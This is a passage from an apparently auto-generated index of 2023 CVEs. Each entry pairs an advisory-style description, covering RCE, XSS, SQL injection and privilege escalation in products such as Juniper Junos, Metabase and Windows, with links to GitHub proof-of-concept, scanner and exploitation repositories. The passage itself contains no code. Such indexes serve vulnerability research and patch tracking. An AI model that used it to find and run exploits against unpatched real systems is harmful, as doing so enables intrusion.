- [unknown00759/CVE-2023-36159](https://github.com/unknown00759/CVE-2023-36159)

### CVE-2023-36163 (2023-07-11)

Cross Site Scripting vulnerability in IP-DOT BuildaGate v.BuildaGate5 allows a remote attacker to execute arbitrary code via a crafted script to the mc parameter of the URL.

- [TraiLeR2/CVE-2023-36163](https://github.com/TraiLeR2/CVE-2023-36163)

### CVE-2023-36164
- [TraiLeR2/CVE-2023-36164](https://github.com/TraiLeR2/CVE-2023-36164)

### CVE-2023-36165
- [TraiLeR2/CVE-2023-36165](https://github.com/TraiLeR2/CVE-2023-36165)

### CVE-2023-36168
- [TraiLeR2/CVE-2023-36168](https://github.com/TraiLeR2/CVE-2023-36168)

### CVE-2023-36169
- [TraiLeR2/CVE-2023-36169](https://github.com/TraiLeR2/CVE-2023-36169)

### CVE-2023-36250 (2023-09-14)

CSV Injection vulnerability in GNOME time tracker version 3.0.2 allows local attackers to execute arbitrary code via a crafted .tsv file when creating a new record.

- [BrunoTeixeira1996/CVE-2023-36250](https://github.com/BrunoTeixeira1996/CVE-2023-36250)

### CVE-2023-36281 (2023-08-22)

An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via a JSON file to load_prompt. This is related to `__subclasses__` or a template.

- [tagomaru/CVE-2023-36281](https://github.com/tagomaru/CVE-2023-36281)
- [miguelc49/CVE-2023-36281-2](https://github.com/miguelc49/CVE-2023-36281-2)
- [miguelc49/CVE-2023-36281-1](https://github.com/miguelc49/CVE-2023-36281-1)

### CVE-2023-36319 (2023-09-19)

File Upload vulnerability in Openupload Stable v.0.4.3 allows a remote attacker to execute arbitrary code via the action parameter of the compress-inc.php file.

- [Lowalu/CVE-2023-36319](https://github.com/Lowalu/CVE-2023-36319)

### CVE-2023-36407 (2023-11-14)

Windows Hyper-V Elevation of Privilege Vulnerability

- [zha0/CVE-2023-36407](https://github.com/zha0/CVE-2023-36407)
- [pwndorei/CVE-2023-36407](https://github.com/pwndorei/CVE-2023-36407)

### CVE-2023-36424 (2023-11-14)

Windows Common Log File System Driver Elevation of Privilege Vulnerability

- [Nassim-Asrir/CVE-2023-36424](https://github.com/Nassim-Asrir/CVE-2023-36424)

### CVE-2023-36427 (2023-11-14)

Windows Hyper-V Elevation of Privilege Vulnerability

- [tandasat/CVE-2023-36427](https://github.com/tandasat/CVE-2023-36427)

### CVE-2023-36531
- [RandomRobbieBF/CVE-2023-36531](https://github.com/RandomRobbieBF/CVE-2023-36531)

### CVE-2023-36643 (2024-04-04)

Incorrect Access Control in ITB-GmbH TradePro v9.5 allows remote attackers to receive all orders from the online shop via the oordershow component in the customer function.

- [caffeinated-labs/CVE-2023-36643](https://github.com/caffeinated-labs/CVE-2023-36643)

### CVE-2023-36644 (2024-04-04)

Incorrect Access Control in ITB-GmbH TradePro v9.5 allows remote attackers to receive all order confirmations from the online shop via the printmail plugin.

- [caffeinated-labs/CVE-2023-36644](https://github.com/caffeinated-labs/CVE-2023-36644)

### CVE-2023-36645 (2024-04-04)

SQL injection vulnerability in ITB-GmbH TradePro v9.5 allows remote attackers to run SQL queries via the oordershow component in the customer function.

- [caffeinated-labs/CVE-2023-36645](https://github.com/caffeinated-labs/CVE-2023-36645)

### CVE-2023-36664 (2023-06-25)

Artifex Ghostscript through 10.01.2 mishandles permission validation for pipe devices (with the %pipe% prefix or the | pipe character prefix).

- [jakabakos/CVE-2023-36664-Ghostscript-command-injection](https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection)
- [winkler-winsen/Scan_GhostScript](https://github.com/winkler-winsen/Scan_GhostScript)
- [jeanchpt/CVE-2023-36664](https://github.com/jeanchpt/CVE-2023-36664)
- [churamanib/CVE-2023-36664-Ghostscript-command-injection](https://github.com/churamanib/CVE-2023-36664-Ghostscript-command-injection)

### CVE-2023-36723 (2023-10-10)

Windows Container Manager Service Elevation of Privilege Vulnerability

- [Wh04m1001/CVE-2023-36723](https://github.com/Wh04m1001/CVE-2023-36723)

### CVE-2023-36745 (2023-09-12)

Microsoft Exchange Server Remote Code Execution Vulnerability

- [N1k0la-T/CVE-2023-36745](https://github.com/N1k0la-T/CVE-2023-36745)

### CVE-2023-36802 (2023-09-12)

Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability

- [chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802](https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802)
- [4zur-0312/CVE-2023-36802](https://github.com/4zur-0312/CVE-2023-36802)
- [x0rb3l/CVE-2023-36802-MSKSSRV-LPE](https://github.com/x0rb3l/CVE-2023-36802-MSKSSRV-LPE)
- [Nero22k/cve-2023-36802](https://github.com/Nero22k/cve-2023-36802)
- [ISH2YU/CVE-2023-36802](https://github.com/ISH2YU/CVE-2023-36802)

### CVE-2023-36812 (2023-06-30)

OpenTSDB is an open source, distributed, scalable Time Series Database (TSDB). OpenTSDB is vulnerable to a Remote Code Execution vulnerability by writing user-controlled input to a Gnuplot configuration file and running Gnuplot with the generated configuration. This issue has been patched in commit `07c4641471c` and further refined in commit `fa88d3e4b`. These patches are available in the `2.4.2` release. Users are advised to upgrade. Users unable to upgrade may disable Gnuplot via the config option `tsd.core.enable_ui = true` and remove the shell files `mygnuplot.bat` and `mygnuplot.sh`.

- [ErikWynter/opentsdb_key_cmd_injection](https://github.com/ErikWynter/opentsdb_key_cmd_injection)

### CVE-2023-36844 (2023-08-17)

A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environment variables. Using a crafted request an attacker is able to modify certain PHP environment variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities. This issue affects Juniper Networks Junos OS on EX Series: all versions prior to 20.4R3-S9; 21.1 versions 21.1R1 and later; 21.2 versions prior to 21.2R3-S7; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R3-S1; 22.4 versions prior to 22.4R2-S2, 22.4R3; 23.2 versions prior to 23.2R1-S1, 23.2R2.

- [watchtowrlabs/juniper-rce_cve-2023-36844](https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844)
- [ThatNotEasy/CVE-2023-36844](https://github.com/ThatNotEasy/CVE-2023-36844)
- [r3dcl1ff/CVE-2023-36844_Juniper_RCE](https://github.com/r3dcl1ff/CVE-2023-36844_Juniper_RCE)

### CVE-2023-36845 (2023-08-17)

A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code. Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection and execution of code. This issue affects Juniper Networks Junos OS on EX Series and SRX Series: all versions prior to 20.4R3-S9; 21.1 versions 21.1R1 and later; 21.2 versions prior to 21.2R3-S7; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.2 versions prior to 23.2R1-S1, 23.2R2.

- [vulncheck-oss/cve-2023-36845-scanner](https://github.com/vulncheck-oss/cve-2023-36845-scanner)
- [kljunowsky/CVE-2023-36845](https://github.com/kljunowsky/CVE-2023-36845)
- [toanln-cov/CVE-2023-36845](https://github.com/toanln-cov/CVE-2023-36845)
- [halencarjunior/CVE-2023-36845](https://github.com/halencarjunior/CVE-2023-36845)
- [zaenhaxor/CVE-2023-36845](https://github.com/zaenhaxor/CVE-2023-36845)
- [simrotion13/CVE-2023-36845](https://github.com/simrotion13/CVE-2023-36845)
- [cyberh3als/CVE-2023-36845-POC](https://github.com/cyberh3als/CVE-2023-36845-POC)
- [3yujw7njai/ansible-cve-2023-36845](https://github.com/3yujw7njai/ansible-cve-2023-36845)
- [Asbawy/Automation-for-Juniper-cve-2023-36845](https://github.com/Asbawy/Automation-for-Juniper-cve-2023-36845)
- [jahithoque/Juniper-CVE-2023-36845-Mass-Hunting](https://github.com/jahithoque/Juniper-CVE-2023-36845-Mass-Hunting)
- [cyb3rzest/Juniper-Bug-Automation-CVE-2023-36845](https://github.com/cyb3rzest/Juniper-Bug-Automation-CVE-2023-36845)
- [CharonDefalt/Juniper-exploit-CVE-2023-36845](https://github.com/CharonDefalt/Juniper-exploit-CVE-2023-36845)
- [iveresk/CVE-2023-36845-6-](https://github.com/iveresk/CVE-2023-36845-6-)
- [ak1t4/CVE-2023-36845](https://github.com/ak1t4/CVE-2023-36845)
- [0xNehru/CVE-2023-36845-Juniper-Vulnerability](https://github.com/0xNehru/CVE-2023-36845-Juniper-Vulnerability)
- [ifconfig-me/CVE-2023-36845](https://github.com/ifconfig-me/CVE-2023-36845)
- [e11i0t4lders0n/CVE-2023-36845](https://github.com/e11i0t4lders0n/CVE-2023-36845)
- [Vignesh2712/Automation-for-Juniper-cve-2023-36845](https://github.com/Vignesh2712/Automation-for-Juniper-cve-2023-36845)
- [functionofpwnosec/CVE-2023-36845](https://github.com/functionofpwnosec/CVE-2023-36845)

### CVE-2023-36846 (2023-08-17)

A Missing Authentication for Critical Function vulnerability in Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity. With a specific request to user.php that doesn't require authentication an attacker is able to upload arbitrary files via J-Web, leading to a loss of integrity for a certain part of the file system, which may allow chaining to other vulnerabilities. This issue affects Juniper Networks Junos OS on SRX Series: all versions prior to 20.4R3-S8; 21.1 versions 21.1R1 and later; 21.2 versions prior to 21.2R3-S6; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S3; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R2-S2, 22.3R3; 22.4 versions prior to 22.4R2-S1, 22.4R3.

- [Chocapikk/CVE-2023-36846](https://github.com/Chocapikk/CVE-2023-36846)

### CVE-2023-36874 (2023-07-11)

Windows Error Reporting Service Elevation of Privilege Vulnerability

- [d0rb/CVE-2023-36874](https://github.com/d0rb/CVE-2023-36874)
- [crisprss/CVE-2023-36874](https://github.com/crisprss/CVE-2023-36874)
- [Wh04m1001/CVE-2023-36874](https://github.com/Wh04m1001/CVE-2023-36874)
- [Octoberfest7/CVE-2023-36874_BOF](https://github.com/Octoberfest7/CVE-2023-36874_BOF)

### CVE-2023-36884 (2023-07-11)

Windows Search Remote Code Execution Vulnerability

- [Maxwitat/CVE-2023-36884-Scripts-for-Intune-Remediation-SCCM-Compliance-Baseline](https://github.com/Maxwitat/CVE-2023-36884-Scripts-for-Intune-Remediation-SCCM-Compliance-Baseline)
- [deepinstinct/Storm0978-RomCom-Campaign](https://github.com/deepinstinct/Storm0978-RomCom-Campaign)
- [zerosorai/CVE-2023-36884](https://github.com/zerosorai/CVE-2023-36884)
- [tarraschk/CVE-2023-36884-Checker](https://github.com/tarraschk/CVE-2023-36884-Checker)
- [or2me/CVE-2023-36884_patcher](https://github.com/or2me/CVE-2023-36884_patcher)
- [ToddMaxey/CVE-2023-36884](https://github.com/ToddMaxey/CVE-2023-36884)
- [ridsoliveira/Fix-CVE-2023-36884](https://github.com/ridsoliveira/Fix-CVE-2023-36884)
- [raresteak/CVE-2023-36884](https://github.com/raresteak/CVE-2023-36884)
- [jakabakos/CVE-2023-36884-MS-Office-HTML-RCE](https://github.com/jakabakos/CVE-2023-36884-MS-Office-HTML-RCE)

### CVE-2023-36899 (2023-08-08)

ASP.NET Elevation of Privilege Vulnerability

- [d0rb/CVE-2023-36899](https://github.com/d0rb/CVE-2023-36899)
- [midisec/CVE-2023-36899](https://github.com/midisec/CVE-2023-36899)

### CVE-2023-36900 (2023-08-08)

Windows Common Log File System Driver Elevation of Privilege Vulnerability

- [RomanRybachek/CVE-2023-36900](https://github.com/RomanRybachek/CVE-2023-36900)

### CVE-2023-37073
- [Hamza0X/CVE-2023-37073](https://github.com/Hamza0X/CVE-2023-37073)

### CVE-2023-37164 (2023-07-20)

Diafan CMS v6.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the cat_id parameter at /shop/?module=shop&action=search.

- [ilqarli27/CVE-2023-37164](https://github.com/ilqarli27/CVE-2023-37164)

### CVE-2023-37189 (2023-07-11)

A stored cross site scripting (XSS) vulnerability in index.php?menu=billing_rates of Issabel PBX version 4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the Name or Prefix fields under the Create New Rate module.

- [sahiloj/CVE-2023-37189](https://github.com/sahiloj/CVE-2023-37189)

### CVE-2023-37190 (2023-07-11)

A stored cross-site scripting (XSS) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Virtual Fax Name and Caller ID Name parameters under the New Virtual Fax feature.

- [sahiloj/CVE-2023-37190](https://github.com/sahiloj/CVE-2023-37190)

### CVE-2023-37191 (2023-07-11)

A stored cross-site scripting (XSS) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Group and Description parameters.

- [sahiloj/CVE-2023-37191](https://github.com/sahiloj/CVE-2023-37191)

### CVE-2023-37250 (2023-08-20)

Unity Parsec has a TOCTOU race condition that permits local attackers to escalate privileges to SYSTEM if Parsec was installed in "Per User" mode. The application intentionally launches DLLs from a user-owned directory but intended to always perform integrity verification of those DLLs. This affects Parsec Loader versions through 8. Parsec Loader 9 is a fixed version.

- [ewilded/CVE-2023-37250-POC](https://github.com/ewilded/CVE-2023-37250-POC)

### CVE-2023-37474 (2023-07-14)

Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.

- [ilqarli27/CVE-2023-37474](https://github.com/ilqarli27/CVE-2023-37474)

### CVE-2023-37478 (2023-08-01)

pnpm is a package manager. It is possible to construct a tarball that, when installed via npm or parsed by the registry is safe, but when installed via pnpm is malicious, due to how pnpm parses tar archives. This can result in a package that appears safe on the npm registry or when installed via npm being replaced with a compromised or malicious version when installed via pnpm. This issue has been patched in version(s) 7.33.4 and 8.6.8.

- [TrevorGKann/CVE-2023-37478_npm_vs_pnpm](https://github.com/TrevorGKann/CVE-2023-37478_npm_vs_pnpm)
- [li-minhao/CVE-2023-37478-Demo](https://github.com/li-minhao/CVE-2023-37478-Demo)

### CVE-2023-37582 (2023-07-12)

The RocketMQ NameServer component still has a remote command execution vulnerability, as the CVE-2023-33246 issue was not completely fixed in version 5.1.1. When NameServer addresses are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system user that RocketMQ is running as. It is recommended for users to upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x, or 4.9.7 or above for RocketMQ 4.x, to prevent these attacks.

- [Malayke/CVE-2023-37582_EXPLOIT](https://github.com/Malayke/CVE-2023-37582_EXPLOIT)

### CVE-2023-37596 (2023-07-11)

Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via a crafted script to the deleteuser function.

- [sahiloj/CVE-2023-37596](https://github.com/sahiloj/CVE-2023-37596)

### CVE-2023-37597 (2023-07-11)

Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via the delete user grouplist function.

- [sahiloj/CVE-2023-37597](https://github.com/sahiloj/CVE-2023-37597)

### CVE-2023-37598 (2023-07-13)

A Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via the delete new virtual fax function.

- [sahiloj/CVE-2023-37598](https://github.com/sahiloj/CVE-2023-37598)

### CVE-2023-37599 (2023-07-13)

An issue in issabel-pbx v.4.0.0-6 allows a remote attacker to obtain sensitive information via the modules directory.

- [sahiloj/CVE-2023-37599](https://github.com/sahiloj/CVE-2023-37599)

### CVE-2023-37621
- [MY0723/CNVD-2022-27366__CVE-2023-37621](https://github.com/MY0723/CNVD-2022-27366__CVE-2023-37621)

### CVE-2023-37625 (2023-08-10)

A stored cross-site scripting (XSS) vulnerability in Netbox v3.4.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Custom Link templates.

- [benjaminpsinclair/Netbox-CVE-2023-37625](https://github.com/benjaminpsinclair/Netbox-CVE-2023-37625)

### CVE-2023-37739 (2023-09-14)

i-doit Pro v25 and below was discovered to be vulnerable to path traversal.

- [leekenghwa/CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below)

### CVE-2023-37755 (2023-09-14)

i-doit pro 25 and below and I-doit open 25 and below are configured with insecure default administrator credentials, and there is no warning or prompt to ask users to change the default password and account name. Unauthenticated attackers can exploit this vulnerability to obtain Administrator privileges, resulting in them being able to perform arbitrary system operations or cause a Denial of Service (DoS).

- [leekenghwa/CVE-2023-37755---Hardcoded-Admin-Credential-in-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37755---Hardcoded-Admin-Credential-in-i-doit-Pro-25-and-below)

### CVE-2023-37756 (2023-09-14)

I-doit pro 25 and below and I-doit open 25 and below employ weak password requirements for Administrator account creation. Attackers are able to easily guess users' passwords via a brute-force attack.

- [leekenghwa/CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below)

### CVE-2023-37771 (2023-07-31)

Art Gallery Management System v1.0 contains a SQL injection vulnerability via the cid parameter at /agms/product.php.

- [anky-123/CVE-2023-37771](https://github.com/anky-123/CVE-2023-37771)

### CVE-2023-37772 (2023-08-01)

Online Shopping Portal Project v3.1 was discovered to contain a SQL injection vulnerability via the Email parameter at /shopping/login.php.

- [anky-123/CVE-2023-37772](https://github.com/anky-123/CVE-2023-37772)

### CVE-2023-37778
- [jyoti818680/CVE-2023-37778](https://github.com/jyoti818680/CVE-2023-37778)

### CVE-2023-37779
- [jyoti818680/CVE-2023-37779](https://github.com/jyoti818680/CVE-2023-37779)

### CVE-2023-37786 (2023-07-13)

Multiple cross-site scripting (XSS) vulnerabilities in Geeklog v2.2.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Mail Settings[backend], Mail Settings[host], Mail Settings[port] and Mail Settings[auth] parameters of the /admin/configuration.php.

- [Phamchie/CVE-2023-37786](https://github.com/Phamchie/CVE-2023-37786)

### CVE-2023-37790 (2023-11-08)

Jaspersoft Clarity PPM version 14.3.0.298 was discovered to contain an arbitrary file upload vulnerability via the Profile Picture Upload function.

- [kaizensecurity/CVE-2023-37790](https://github.com/kaizensecurity/CVE-2023-37790)

### CVE-2023-37800
- [TraiLeR2/CVE-2023-37800](https://github.com/TraiLeR2/CVE-2023-37800)

### CVE-2023-37903 (2023-07-21)

vm2 is an open source vm/sandbox for Node.js. In vm2 for versions up to and including 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code. This may result in Remote Code Execution, assuming the attacker has arbitrary code execution primitive inside the context of vm2 sandbox. There are no patches and no known workarounds. Users are advised to find an alternative software.

- [7h3h4ckv157/CVE-2023-37903](https://github.com/7h3h4ckv157/CVE-2023-37903)

### CVE-2023-37941 (2023-09-06)

If an attacker gains write access to the Apache Superset metadata database, they could persist a specifically crafted Python object that may lead to remote code execution on Superset's web backend. The Superset metadata db is an 'internal' component that is typically only accessible directly by the system administrator and the superset process itself. Gaining access to that database should be difficult and require significant privileges. This vulnerability impacts Apache Superset versions 1.5.0 up to and including 2.1.0. Users are recommended to upgrade to version 2.1.1 or later.

- [Barroqueiro/CVE-2023-37941](https://github.com/Barroqueiro/CVE-2023-37941)

### CVE-2023-37979 (2023-07-27)

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Saturday Drive Ninja Forms Contact Form plugin <= 3.6.25 versions.

- [Mehran-Seifalinia/CVE-2023-37979](https://github.com/Mehran-Seifalinia/CVE-2023-37979)
- [d0rb/CVE-2023-37979](https://github.com/d0rb/CVE-2023-37979)

### CVE-2023-38035 (2023-08-21)

A security vulnerability in the MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.

- [horizon3ai/CVE-2023-38035](https://github.com/horizon3ai/CVE-2023-38035)
- [LeakIX/sentryexploit](https://github.com/LeakIX/sentryexploit)
- [mind2hex/CVE-2023-38035](https://github.com/mind2hex/CVE-2023-38035)

### CVE-2023-38039 (2023-09-15)

When curl retrieves an HTTP response, it stores the incoming headers so that they can be accessed later via the libcurl headers API. However, curl did not have a limit in how many or how large headers it would accept in a response, allowing a malicious server to stream an endless series of headers and eventually cause curl to run out of heap memory.

- [Smartkeyss/CVE-2023-38039](https://github.com/Smartkeyss/CVE-2023-38039)

### CVE-2023-38041 (2023-10-25)

A logged-in user may elevate their permissions by abusing a Time-of-Check to Time-of-Use (TOCTOU) race condition. When a particular process flow is initiated, an attacker can exploit this condition to gain unauthorized elevated privileges on the affected system.

- [ewilded/CVE-2023-38041-POC](https://github.com/ewilded/CVE-2023-38041-POC)

### CVE-2023-38120 (2024-05-03)

Adtran SR400ac ping Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adtran SR400ac routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the ping command, which is available over JSON-RPC. A crafted host parameter can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20525.

- [warber0x/CVE-2023-38120](https://github.com/warber0x/CVE-2023-38120)

### CVE-2023-38146 (2023-09-12)

Windows Themes Remote Code Execution Vulnerability

- [exploits-forsale/themebleed](https://github.com/exploits-forsale/themebleed)
- [Jnnshschl/CVE-2023-38146](https://github.com/Jnnshschl/CVE-2023-38146)
- [Durge5/ThemeBleedPy](https://github.com/Durge5/ThemeBleedPy)

### CVE-2023-38408 (2023-07-20)

The PKCS#11 feature in ssh-agent in OpenSSH before 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system. (Code in /usr/lib is not necessarily safe for loading into ssh-agent.) NOTE: this issue exists because of an incomplete fix for CVE-2016-10009.

- [kali-mx/CVE-2023-38408](https://github.com/kali-mx/CVE-2023-38408)
- [LucasPDiniz/CVE-2023-38408](https://github.com/LucasPDiniz/CVE-2023-38408)
- [classic130/CVE-2023-38408](https://github.com/classic130/CVE-2023-38408)
- [wxrdnx/CVE-2023-38408](https://github.com/wxrdnx/CVE-2023-38408)
- [mrtacojr/CVE-2023-38408](https://github.com/mrtacojr/CVE-2023-38408)
- [fazilbaig1/cve_2023_38408_scanner](https://github.com/fazilbaig1/cve_2023_38408_scanner)

### CVE-2023-38434 (2023-07-18)

xHTTP 72f812d has a double free in close_connection in xhttp.c via a malformed HTTP request method.

- [Halcy0nic/CVE-2023-38434](https://github.com/Halcy0nic/CVE-2023-38434)

### CVE-2023-38490 (2023-07-27)

Kirby is a content management system. A vulnerability in versions prior to 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6 only affects Kirby sites that use the `Xml` data handler (e.g. `Data::decode($string, 'xml')`) or the `Xml::parse()` method in site or plugin code. The Kirby core does not use any of the affected methods.

XML External Entities (XXE) is a little-used feature in the XML markup language that allows including data from external files in an XML structure. If the name of the external file can be controlled by an attacker, this becomes a vulnerability that can be abused for various system impacts like the disclosure of internal or confidential data that is stored on the server (arbitrary file disclosure) or to perform network requests on behalf of the server (server-side request forgery, SSRF).

Kirby's `Xml::parse()` method used PHP's `LIBXML_NOENT` constant, which enabled the processing of XML external entities during the parsing operation. The `Xml::parse()` method is used in the `Xml` data handler (e.g. `Data::decode($string, 'xml')`). Both the vulnerable method and the data handler are not used in the Kirby core. However, they may be used in site or plugin code, e.g. to parse RSS feeds or other XML files. If those files are of an external origin (e.g. uploaded by a user or retrieved from an external URL), attackers may be able to include an external entity in the XML file that will then be processed in the parsing process. Kirby sites that don't use XML parsing in site or plugin code are *not* affected.

The problem has been patched in Kirby 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6. In all of the mentioned releases, the maintainers have removed the `LIBXML_NOENT` constant as processing of external entities is out of scope of the parsing logic. This protects all uses of the method against the described vulnerability.

- [Acceis/exploit-CVE-2023-38490](https://github.com/Acceis/exploit-CVE-2023-38490)

### CVE-2023-38497 (2023-08-04)

Cargo downloads the Rust project’s dependencies and compiles the project. Cargo prior to version 0.72.2, bundled with Rust prior to version 1.71.1, did not respect the umask when extracting crate archives on UNIX-like systems. If the user downloaded a crate containing files writeable by any local user, another local user could exploit this to change the source code compiled and executed by the current user. To prevent existing cached extractions from being exploitable, the Cargo binary version 0.72.2 included in Rust 1.71.1 or later will purge caches generated by older Cargo versions automatically. As a workaround, configure one's system to prevent other local users from accessing the Cargo directory, usually located in `~/.cargo`.

- [lucas-cauhe/cargo-perm](https://github.com/lucas-cauhe/cargo-perm)

### CVE-2023-38499 (2023-07-25)

TYPO3 is an open source PHP based web content management system. Starting in version 9.4.0 and prior to versions 9.5.42 ELTS, 10.4.39 ELTS, 11.5.30, and 12.4.4, in multi-site scenarios, enumerating the HTTP query parameters `id` and `L` allowed out-of-scope access to rendered content in the website frontend. For instance, this allowed visitors to access content of an internal site by adding handcrafted query parameters to the URL of a site that was publicly available. TYPO3 versions 9.5.42 ELTS, 10.4.39 ELTS, 11.5.30, 12.4.4 fix the problem.

- [miguelc49/CVE-2023-38499-2](https://github.com/miguelc49/CVE-2023-38499-2)
- [miguelc49/CVE-2023-38499-1](https://github.com/miguelc49/CVE-2023-38499-1)
- [miguelc49/CVE-2023-38499-3](https://github.com/miguelc49/CVE-2023-38499-3)

### CVE-2023-38545 (2023-10-18)

This flaw makes curl overflow a heap based buffer in the SOCKS5 proxy handshake. When curl is asked to pass along the host name to the SOCKS5 proxy to allow that to resolve the address instead of it getting done by curl itself, the maximum length that host name can be is 255 bytes. If the host name is detected to be longer, curl switches to local name resolving and instead passes on the resolved address only. Due to this bug, the local variable that means "let the host resolve the name" could get the wrong value during a slow SOCKS5 handshake, and contrary to the intention, copy the too long host name to the target buffer instead of copying just the resolved address there. The target buffer is a heap based buffer, and the host name comes from the URL that curl has been told to operate with.

- [UTsweetyfish/CVE-2023-38545](https://github.com/UTsweetyfish/CVE-2023-38545)
- [imfht/CVE-2023-38545](https://github.com/imfht/CVE-2023-38545)
- [fatmo666/CVE-2023-38545-libcurl-SOCKS5-heap-buffer-overflow](https://github.com/fatmo666/CVE-2023-38545-libcurl-SOCKS5-heap-buffer-overflow)
- [vanigori/CVE-2023-38545-sample](https://github.com/vanigori/CVE-2023-38545-sample)
- [dbrugman/CVE-2023-38545-POC](https://github.com/dbrugman/CVE-2023-38545-POC)
- [bcdannyboy/CVE-2023-38545](https://github.com/bcdannyboy/CVE-2023-38545)
- [d0rb/CVE-2023-38545](https://github.com/d0rb/CVE-2023-38545)
- [Yang-Shun-Yu/CVE-2023-38545](https://github.com/Yang-Shun-Yu/CVE-2023-38545)
- [nphuang/NS-Project-2024-Spring](https://github.com/nphuang/NS-Project-2024-Spring)

### CVE-2023-38571 (2023-07-28)

This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Big Sur 11.7.9, macOS Monterey 12.6.8, macOS Ventura 13.5. An app may be able to bypass Privacy preferences.

- [gergelykalman/CVE-2023-38571-a-macOS-TCC-bypass-in-Music-and-TV](https://github.com/gergelykalman/CVE-2023-38571-a-macOS-TCC-bypass-in-Music-and-TV)

### CVE-2023-38609 (2023-07-28)

An injection issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13.5. An app may be able to bypass certain Privacy preferences.

- [mc-17/CVE-2023-38609](https://github.com/mc-17/CVE-2023-38609)

### CVE-2023-38632 (2023-07-21)

async-sockets-cpp through 0.3.1 has a stack-based buffer overflow in tcpsocket.hpp when processing malformed TCP packets.

- [Halcy0nic/CVE-2023-38632](https://github.com/Halcy0nic/CVE-2023-38632)

### CVE-2023-38646 (2023-07-21)

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

- [adriyansyah-mf/CVE-2023-38646--Metabase-](https://github.com/adriyansyah-mf/CVE-2023-38646--Metabase-)
- [Pumpkin-Garden/POC_Metabase_CVE-2023-38646](https://github.com/Pumpkin-Garden/POC_Metabase_CVE-2023-38646)
- [0xrobiul/CVE-2023-38646](https://github.com/0xrobiul/CVE-2023-38646)
- [Chocapikk/CVE-2023-38646](https://github.com/Chocapikk/CVE-2023-38646)
- [Xuxfff/CVE-2023-38646-Poc](https://github.com/Xuxfff/CVE-2023-38646-Poc)
- [securezeron/CVE-2023-38646](https://github.com/securezeron/CVE-2023-38646)
- [raytheon0x21/CVE-2023-38646](https://github.com/raytheon0x21/CVE-2023-38646)
- [Zenmovie/CVE-2023-38646](https://github.com/Zenmovie/CVE-2023-38646)
- [shamo0/CVE-2023-38646-PoC](https://github.com/shamo0/CVE-2023-38646-PoC)
- [fidjiw/CVE-2023-38646-POC](https://github.com/fidjiw/CVE-2023-38646-POC)
